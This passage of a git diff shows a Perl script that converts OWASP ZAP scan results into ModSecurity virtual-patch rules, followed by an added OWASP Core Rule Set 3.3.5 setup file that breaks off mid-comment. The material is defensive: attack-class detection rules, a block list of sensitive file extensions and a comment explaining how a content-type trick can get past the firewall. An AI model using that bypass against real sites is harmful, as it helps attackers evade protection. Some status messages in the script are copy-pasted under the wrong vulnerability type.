wait_for_keypress(); + } + return; + } + + $current_uricontent = get_uricontent($current_vuln_url); + + + # Only need param if XSS attack,SQLINJ,XPATH + # and maybe for HTTPRS, DT. + # NOT for PRL and DI + + if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ + @current_params = $param[$vuln_count]; + + } + if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ + print "Current vulnerable Param(s): @current_params\n"; + } + + generate_patch($vuln_str,$current_uricontent,@current_params); + + +} + + +sub generate_patch +{ + my($type,$uricontent,@params,$current_vuln_xml) = @_; + my $rule = ""; + $id = "1".$vuln_count; + + switch($type) + { + case ($VULN_CLASS_XSS) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + # Check to see if each vulnerable parameter is valid + # then generate a rule using both uricontent and the + # parameter + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/XSS.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_XSS (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + } + } + } + } + + case ($VULN_CLASS_SQLI) + { + + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_BLIND_SQLI) + { + + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_LFI) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/LFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_RFI) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + case ($VULN_CLASS_HTTPRS) + { + if($uricontent ne "" && @params){ + foreach(@params){ + if($_ ne ""){ + $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RESPONSE_SPLITTING.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; + + print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; + print "$VULN_CLASS_RFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; + $num_rules_generated++; + + + } + } + } + } + + } +} + +sub get_uricontent +{ + my($url) = @_; + my $regex = "http:\/\/+[a-zA-Z0-9.:-]*\/"; + + # First, trim the first part out of the URL: + # http://.../ + $url =~ /$regex/; + substr($url,index($url,$&),length($&)) = ""; + + # If the URL contains a php or cgi query with + # one or more params and values, trim those out. + # Trim from the question mark to the end. + if($url =~ /\?/){ + substr($url,index($url,"?")) = ""; + } + return $url; + +} diff --git a/src/common/core/modsecurity/files/coreruleset/plugins/README.md b/src/common/core/modsecurity/files/coreruleset/plugins/README.md deleted file mode 100644 index 4c2cc9d4f..000000000 --- a/src/common/core/modsecurity/files/coreruleset/plugins/README.md +++ /dev/null @@ -1,7 +0,0 @@ -This is the folder where you install CRS plugins. - -See https://github.com/coreruleset/plugin-registry -for a list of registered official and 3rd party plugins. - -Plugins are documented in the CRS INSTALL file and -in also with said plugin registry. diff --git a/src/common/core/modsecurity/files/coreruleset/plugins/empty-before.conf b/src/common/core/modsecurity/files/coreruleset/plugins/empty-before.conf deleted file mode 100644 index e69de29bb..000000000 diff --git a/src/common/core/modsecurity/files/coreruleset/plugins/empty-config.conf b/src/common/core/modsecurity/files/coreruleset/plugins/empty-config.conf deleted file mode 100644 index e69de29bb..000000000 diff --git a/src/common/core/modsecurity/files/crs-setup-v3.conf b/src/common/core/modsecurity/files/crs-setup-v3.conf new file mode 100644 index 000000000..e0b1d9cde --- /dev/null +++ b/src/common/core/modsecurity/files/crs-setup-v3.conf @@ -0,0 +1,869 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + + +# +# -- [[ Introduction ]] -------------------------------------------------------- +# +# The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack +# detection rules that provide a base level of protection for any web +# application. They are written for the open source, cross-platform +# ModSecurity Web Application Firewall. +# +# See also: +# https://coreruleset.org/ +# https://github.com/SpiderLabs/owasp-modsecurity-crs +# https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project +# + + +# +# -- [[ System Requirements ]] ------------------------------------------------- +# +# CRS requires ModSecurity version 2.8.0 or above. +# We recommend to always use the newest ModSecurity version. +# +# The configuration directives/settings in this file are used to control +# the OWASP ModSecurity CRS. These settings do **NOT** configure the main +# ModSecurity settings (modsecurity.conf) such as SecRuleEngine, +# SecRequestBodyAccess, SecAuditEngine, SecDebugLog, and XML processing. +# +# The CRS assumes that modsecurity.conf has been loaded. It is bundled with +# ModSecurity. If you don't have it, you can get it from: +# 2.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v2/master/modsecurity.conf-recommended +# 3.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/modsecurity.conf-recommended +# +# The order of file inclusion in your webserver configuration should always be: +# 1. modsecurity.conf +# 2. crs-setup.conf (this file) +# 3. rules/*.conf (the CRS rule files) +# +# Please refer to the INSTALL file for detailed installation instructions. +# + + +# +# -- [[ Mode of Operation: Anomaly Scoring vs. Self-Contained ]] --------------- +# +# The CRS can run in two modes: +# +# -- [[ Anomaly Scoring Mode (default) ]] -- +# In CRS3, anomaly mode is the default and recommended mode, since it gives the +# most accurate log information and offers the most flexibility in setting your +# blocking policies. It is also called "collaborative detection mode". +# In this mode, each matching rule increases an 'anomaly score'. +# At the conclusion of the inbound rules, and again at the conclusion of the +# outbound rules, the anomaly score is checked, and the blocking evaluation +# rules apply a disruptive action, by default returning an error 403. +# +# -- [[ Self-Contained Mode ]] -- +# In this mode, rules apply an action instantly. This was the CRS2 default. +# It can lower resource usage, at the cost of less flexibility in blocking policy +# and less informative audit logs (only the first detected threat is logged). +# Rules inherit the disruptive action that you specify (i.e. deny, drop, etc). +# The first rule that matches will execute this action. In most cases this will +# cause evaluation to stop after the first rule has matched, similar to how many +# IDSs function. +# +# -- [[ Alert Logging Control ]] -- +# In the mode configuration, you must also adjust the desired logging options. +# There are three common options for dealing with logging. By default CRS enables +# logging to the webserver error log (or Event viewer) plus detailed logging to +# the ModSecurity audit log (configured under SecAuditLog in modsecurity.conf). +# +# - To log to both error log and ModSecurity audit log file, use: "log,auditlog" +# - To log *only* to the ModSecurity audit log file, use: "nolog,auditlog" +# - To log *only* to the error log file, use: "log,noauditlog" +# +# Examples for the various modes follow. +# You must leave one of the following options enabled. +# Note that you must specify the same line for phase:1 and phase:2. +# + +# Default: Anomaly Scoring mode, log to error log, log to ModSecurity audit log +# - By default, offending requests are blocked with an error 403 response. +# - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example +# and review section 'Changing the Disruptive Action for Anomaly Mode'. +# - In Apache, you can use ErrorDocument to show a friendly error page or +# perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html +# +SecDefaultAction "phase:1,log,auditlog,pass" +SecDefaultAction "phase:2,log,auditlog,pass" + +# Example: Anomaly Scoring mode, log only to ModSecurity audit log +# - By default, offending requests are blocked with an error 403 response. +# - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example +# and review section 'Changing the Disruptive Action for Anomaly Mode'. +# - In Apache, you can use ErrorDocument to show a friendly error page or +# perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html +# +# SecDefaultAction "phase:1,nolog,auditlog,pass" +# SecDefaultAction "phase:2,nolog,auditlog,pass" + +# Example: Self-contained mode, return error 403 on blocking +# - In this configuration the default disruptive action becomes 'deny'. After a +# rule triggers, it will stop processing the request and return an error 403. +# - You can also use a different error status, such as 404, 406, et cetera. +# - In Apache, you can use ErrorDocument to show a friendly error page or +# perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html +# +# SecDefaultAction "phase:1,log,auditlog,deny,status:403" +# SecDefaultAction "phase:2,log,auditlog,deny,status:403" + +# Example: Self-contained mode, redirect back to homepage on blocking +# - In this configuration the 'tag' action includes the Host header data in the +# log. This helps to identify which virtual host triggered the rule (if any). +# - Note that this might cause redirect loops in some situations; for example +# if a Cookie or User-Agent header is blocked, it will also be blocked when +# the client subsequently tries to access the homepage. You can also redirect +# to another custom URL. +# SecDefaultAction "phase:1,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'" +# SecDefaultAction "phase:2,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'" + + +# +# -- [[ Paranoia Level Initialization ]] --------------------------------------- +# +# The Paranoia Level (PL) setting allows you to choose the desired level +# of rule checks that will add to your anomaly scores. +# +# With each paranoia level increase, the CRS enables additional rules +# giving you a higher level of security. However, higher paranoia levels +# also increase the possibility of blocking some legitimate traffic due to +# false alarms (also named false positives or FPs). If you use higher +# paranoia levels, it is likely that you will need to add some exclusion +# rules for certain requests and applications receiving complex input. +# +# - A paranoia level of 1 is default. In this level, most core rules +# are enabled. PL1 is advised for beginners, installations +# covering many different sites and applications, and for setups +# with standard security requirements. +# At PL1 you should face FPs rarely. If you encounter FPs, please +# open an issue on the CRS GitHub site and don't forget to attach your +# complete Audit Log record for the request with the issue. +# - Paranoia level 2 includes many extra rules, for instance enabling +# many regexp-based SQL and XSS injection protections, and adding +# extra keywords checked for code injections. PL2 is advised +# for moderate to experienced users desiring more complete coverage +# and for installations with elevated security requirements. +# PL2 comes with some FPs which you need to handle. +# - Paranoia level 3 enables more rules and keyword lists, and tweaks +# limits on special characters used. PL3 is aimed at users experienced +# at the handling of FPs and at installations with a high security +# requirement. +# - Paranoia level 4 further restricts special characters. +# The highest level is advised for experienced users protecting +# installations with very high security requirements. Running PL4 will +# likely produce a very high number of FPs which have to be +# treated before the site can go productive. +# +# All rules will log their PL to the audit log; +# example: [tag "paranoia-level/2"]. This allows you to deduct from the +# audit log how the WAF behavior is affected by paranoia level. +# +# It is important to also look into the variable +# tx.enforce_bodyproc_urlencoded (Enforce Body Processor URLENCODED) +# defined below. Enabling it closes a possible bypass of CRS. +# +# Uncomment this rule to change the default: +# +#SecAction \ +# "id:900000,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.paranoia_level=1" + + +# It is possible to execute rules from a higher paranoia level but not include +# them in the anomaly scoring. This allows you to take a well-tuned system on +# paranoia level 1 and add rules from paranoia level 2 without having to fear +# the new rules would lead to false positives that raise your score above the +# threshold. +# This optional feature is enabled by uncommenting the following rule and +# setting the tx.executing_paranoia_level. +# Technically, rules up to the level defined in tx.executing_paranoia_level +# will be executed, but only the rules up to tx.paranoia_level affect the +# anomaly scores. +# By default, tx.executing_paranoia_level is set to tx.paranoia_level. +# tx.executing_paranoia_level must not be lower than tx.paranoia_level. +# +# Please notice that setting tx.executing_paranoia_level to a higher paranoia +# level results in a performance impact that is equally high as setting +# tx.paranoia_level to said level. +# +#SecAction \ +# "id:900001,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.executing_paranoia_level=1" + + +# +# -- [[ Enforce Body Processor URLENCODED ]] ----------------------------------- +# +# ModSecurity selects the body processor based on the Content-Type request +# header. But clients are not always setting the Content-Type header for their +# request body payloads. This will leave ModSecurity with limited vision into +# the payload. The variable tx.enforce_bodyproc_urlencoded lets you force the +# URLENCODED body processor in these situations. This is off by default, as it +# implies a change of the behaviour of ModSecurity beyond CRS (the body +# processor applies to all rules, not only CRS) and because it may lead to +# false positives already on paranoia level 1. However, enabling this variable +# closes a possible bypass of CRS so it should be considered. +# +# Uncomment this rule to change the default: +# +#SecAction \ +# "id:900010,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.enforce_bodyproc_urlencoded=1" + + +# +# -- [[ Anomaly Mode Severity Levels ]] ---------------------------------------- +# +# Each rule in the CRS has an associated severity level. +# These are the default scoring points for each severity level. +# These settings will be used to increment the anomaly score if a rule matches. +# You may adjust these points to your liking, but this is usually not needed. +# +# - CRITICAL severity: Anomaly Score of 5. +# Mostly generated by the application attack rules (93x and 94x files). +# - ERROR severity: Anomaly Score of 4. +# Generated mostly from outbound leakage rules (95x files). +# - WARNING severity: Anomaly Score of 3. +# Generated mostly by malicious client rules (91x files). +# - NOTICE severity: Anomaly Score of 2. +# Generated mostly by the protocol rules (92x files). +# +# In anomaly mode, these scores are cumulative. +# So it's possible for a request to hit multiple rules. +# +# (Note: In this file, we use 'phase:1' to set CRS configuration variables. +# In general, 'phase:request' is used. However, we want to make absolutely sure +# that all configuration variables are set before the CRS rules are processed.) +# +#SecAction \ +# "id:900100,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.critical_anomaly_score=5,\ +# setvar:tx.error_anomaly_score=4,\ +# setvar:tx.warning_anomaly_score=3,\ +# setvar:tx.notice_anomaly_score=2" + + +# +# -- [[ Anomaly Mode Blocking Threshold Levels ]] ------------------------------ +# +# Here, you can specify at which cumulative anomaly score an inbound request, +# or outbound response, gets blocked. +# +# Most detected inbound threats will give a critical score of 5. +# Smaller violations, like violations of protocol/standards, carry lower scores. +# +# [ At default value ] +# If you keep the blocking thresholds at the defaults, the CRS will work +# similarly to previous CRS versions: a single critical rule match will cause +# the request to be blocked and logged. +# +# [ Using higher values ] +# If you want to make the CRS less sensitive, you can increase the blocking +# thresholds, for instance to 7 (which would require multiple rule matches +# before blocking) or 10 (which would require at least two critical alerts - or +# a combination of many lesser alerts), or even higher. However, increasing the +# thresholds might cause some attacks to bypass the CRS rules or your policies. +# +# [ New deployment strategy: Starting high and decreasing ] +# It is a common practice to start a fresh CRS installation with elevated +# anomaly scoring thresholds (>100) and then lower the limits as your +# confidence in the setup grows. You may also look into the Sampling +# Percentage section below for a different strategy to ease into a new +# CRS installation. +# +# [ Anomaly Threshold / Paranoia Level Quadrant ] +# +# High Anomaly Limit | High Anomaly Limit +# Low Paranoia Level | High Paranoia Level +# -> Fresh Site | -> Experimental Site +# ------------------------------------------------------ +# Low Anomaly Limit | Low Anomaly Limit +# Low Paranoia Level | High Paranoia Level +# -> Standard Site | -> High Security Site +# +# Uncomment this rule to change the defaults: +# +#SecAction \ +# "id:900110,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.inbound_anomaly_score_threshold=5,\ +# setvar:tx.outbound_anomaly_score_threshold=4" + +# +# -- [[ Application Specific Rule Exclusions ]] ---------------------------------------- +# +# Some well-known applications may undertake actions that appear to be +# malicious. This includes actions such as allowing HTML or Javascript within +# parameters. In such cases the CRS aims to prevent false positives by allowing +# administrators to enable prebuilt, application specific exclusions on an +# application by application basis. +# These application specific exclusions are distinct from the rules that would +# be placed in the REQUEST-900-EXCLUSION-RULES-BEFORE-CRS configuration file as +# they are prebuilt for specific applications. The 'REQUEST-900' file is +# designed for users to add their own custom exclusions. Note, using these +# application specific exclusions may loosen restrictions of the CRS, +# especially if used with an application they weren't designed for. As a result +# they should be applied with care. +# To use this functionality you must specify a supported application. To do so +# uncomment rule 900130. In addition to uncommenting the rule you will need to +# specify which application(s) you'd like to enable exclusions for. Only a +# (very) limited set of applications are currently supported, please use the +# filenames prefixed with 'REQUEST-903' to guide you in your selection. +# Such filenames use the following convention: +# REQUEST-903.9XXX-{APPNAME}-EXCLUSIONS-RULES.conf +# +# It is recommended if you run multiple web applications on your site to limit +# the effects of the exclusion to only the path where the excluded webapp +# resides using a rule similar to the following example: +# SecRule REQUEST_URI "@beginsWith /wordpress/" setvar:tx.crs_exclusions_wordpress=1 + +# +# Modify and uncomment this rule to select which application: +# +#SecAction \ +# "id:900130,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.crs_exclusions_cpanel=1,\ +# setvar:tx.crs_exclusions_drupal=1,\ +# setvar:tx.crs_exclusions_dokuwiki=1,\ +# setvar:tx.crs_exclusions_nextcloud=1,\ +# setvar:tx.crs_exclusions_wordpress=1,\ +# setvar:tx.crs_exclusions_xenforo=1" + +# +# -- [[ HTTP Policy Settings ]] ------------------------------------------------ +# +# This section defines your policies for the HTTP protocol, such as: +# - allowed HTTP versions, HTTP methods, allowed request Content-Types +# - forbidden file extensions (e.g. .bak, .sql) and request headers (e.g. Proxy) +# +# These variables are used in the following rule files: +# - REQUEST-911-METHOD-ENFORCEMENT.conf +# - REQUEST-912-DOS-PROTECTION.conf +# - REQUEST-920-PROTOCOL-ENFORCEMENT.conf + +# HTTP methods that a client is allowed to use. +# Default: GET HEAD POST OPTIONS +# Example: for RESTful APIs, add the following methods: PUT PATCH DELETE +# Example: for WebDAV, add the following methods: CHECKOUT COPY DELETE LOCK +# MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH PUT UNLOCK +# Uncomment this rule to change the default. +#SecAction \ +# "id:900200,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" + +# Content-Types that a client is allowed to send in a request. +# Default: |application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| +# |text/xml| |application/xml| |application/soap+xml| |application/json| +# |application/cloudevents+json| |application/cloudevents-batch+json| +# +# Please note, that the rule where CRS uses this variable (920420) evaluates it with operator +# `@within`, which is case sensitive, but uses t:lowercase. You must add your whole custom +# Content-Type with lowercase. +# +# Bypass Warning: some applications may not rely on the content-type request header in order +# to parse the request body. This could make an attacker able to send malicious URLENCODED/JSON/XML +# payloads without being detected by the WAF. Allowing request content-type that doesn't activate any +# body processor (for example: "text/plain", "application/x-amf", "application/octet-stream", etc..) +# could lead to a WAF bypass. For example, a malicious JSON payload submitted with a "text/plain" +# content type may still be interpreted as JSON by a backend application but would not trigger the +# JSON body parser at the WAF, leading to a bypass. +# +# To prevent blocking request with not allowed content-type by default, you can create an exclusion +# rule that removes rule 920420. For example: +# SecRule REQUEST_HEADERS:Content-Type "@rx ^text/plain" \ +# "id:1234,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# ctl:ruleRemoveById=920420,\ +# chain" +# SecRule REQUEST_URI "@rx ^/foo/bar" "t:none" +# +# Uncomment this rule to change the default. +# +#SecAction \ +# "id:900220,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'" + +# Allowed HTTP versions. +# Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 +# Example for legacy clients: HTTP/0.9 HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 +# Note that some web server versions use 'HTTP/2', some 'HTTP/2.0', so +# we include both version strings by default. +# Uncomment this rule to change the default. +#SecAction \ +# "id:900230,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'" + +# Forbidden file extensions. +# Guards against unintended exposure of development/configuration files. +# Default: .asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/ +# Example: .bak/ .config/ .conf/ .db/ .ini/ .log/ .old/ .pass/ .pdb/ .rdb/ .sql/ +# Uncomment this rule to change the default. +#SecAction \ +# "id:900240,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" + +# Forbidden request headers. +# Header names should be lowercase, enclosed by /slashes/ as delimiters. +# Default: /accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ +# +# Note: Accept-Charset is a deprecated header that should not be used by clients and +# ignored by servers. It can be used for a response WAF bypass, by asking for a charset +# that the WAF cannot decode. +# Reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Charset +# +# Note: Content-Encoding is used to list any encodings that have been applied to the +# original payload. It is only used for compression, which isn't supported by CRS by +# default since it blocks newlines and null bytes inside the request body. Most +# compression algorithms require at least null bytes per RFC. Blocking it shouldn't +# break anything and increases security since ModSecurity is incapable of properly +# scanning compressed request bodies. +# +# Note: Blocking Proxy header prevents 'httpoxy' vulnerability: https://httpoxy.org +# +# Uncomment this rule to change the default. +#SecAction \ +# "id:900250,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.restricted_headers=/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/'" + +# File extensions considered static files. +# Extensions include the dot, lowercase, enclosed by /slashes/ as delimiters. +# Used in DoS protection rule. See section "Anti-Automation / DoS Protection". +# Default: /.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/ +# Uncomment this rule to change the default. +#SecAction \ +# "id:900260,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'" + +# Content-Types charsets that a client is allowed to send in a request. +# Default: utf-8|iso-8859-1|iso-8859-15|windows-1252 +# Uncomment this rule to change the default. +# Use "|" to separate multiple charsets like in the rule defining +# tx.allowed_request_content_type. +#SecAction \ +# "id:900280,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'" + +# +# -- [[ HTTP Argument/Upload Limits ]] ----------------------------------------- +# +# Here you can define optional limits on HTTP get/post parameters and uploads. +# This can help to prevent application specific DoS attacks. +# +# These values are checked in REQUEST-920-PROTOCOL-ENFORCEMENT.conf. +# Beware of blocking legitimate traffic when enabling these limits. +# + +# Block request if number of arguments is too high +# Default: unlimited +# Example: 255 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900300,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.max_num_args=255" + +# Block request if the length of any argument name is too high +# Default: unlimited +# Example: 100 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900310,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.arg_name_length=100" + +# Block request if the length of any argument value is too high +# Default: unlimited +# Example: 400 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900320,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.arg_length=400" + +# Block request if the total length of all combined arguments is too high +# Default: unlimited +# Example: 64000 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900330,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.total_arg_length=64000" + +# Block request if the file size of any individual uploaded file is too high +# Default: unlimited +# Example: 1048576 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900340,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.max_file_size=1048576" + +# Block request if the total size of all combined uploaded files is too high +# Default: unlimited +# Example: 1048576 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900350,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.combined_file_sizes=1048576" + + +# +# -- [[ Easing In / Sampling Percentage ]] ------------------------------------- +# +# Adding the Core Rule Set to an existing productive site can lead to false +# positives, unexpected performance issues and other undesired side effects. +# +# It can be beneficial to test the water first by enabling the CRS for a +# limited number of requests only and then, when you have solved the issues (if +# any) and you have confidence in the setup, to raise the ratio of requests +# being sent into the ruleset. +# +# Adjust the percentage of requests that are funnelled into the Core Rules by +# setting TX.sampling_percentage below. The default is 100, meaning that every +# request gets checked by the CRS. The selection of requests, which are going +# to be checked, is based on a pseudo random number generated by ModSecurity. +# +# If a request is allowed to pass without being checked by the CRS, there is no +# entry in the audit log (for performance reasons), but an error log entry is +# written. If you want to disable the error log entry, then issue the +# following directive somewhere after the inclusion of the CRS +# (E.g., RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf). +# +# SecRuleUpdateActionById 901150 "nolog" +# +# ATTENTION: If this TX.sampling_percentage is below 100, then some of the +# requests will bypass the Core Rules completely and you lose the ability 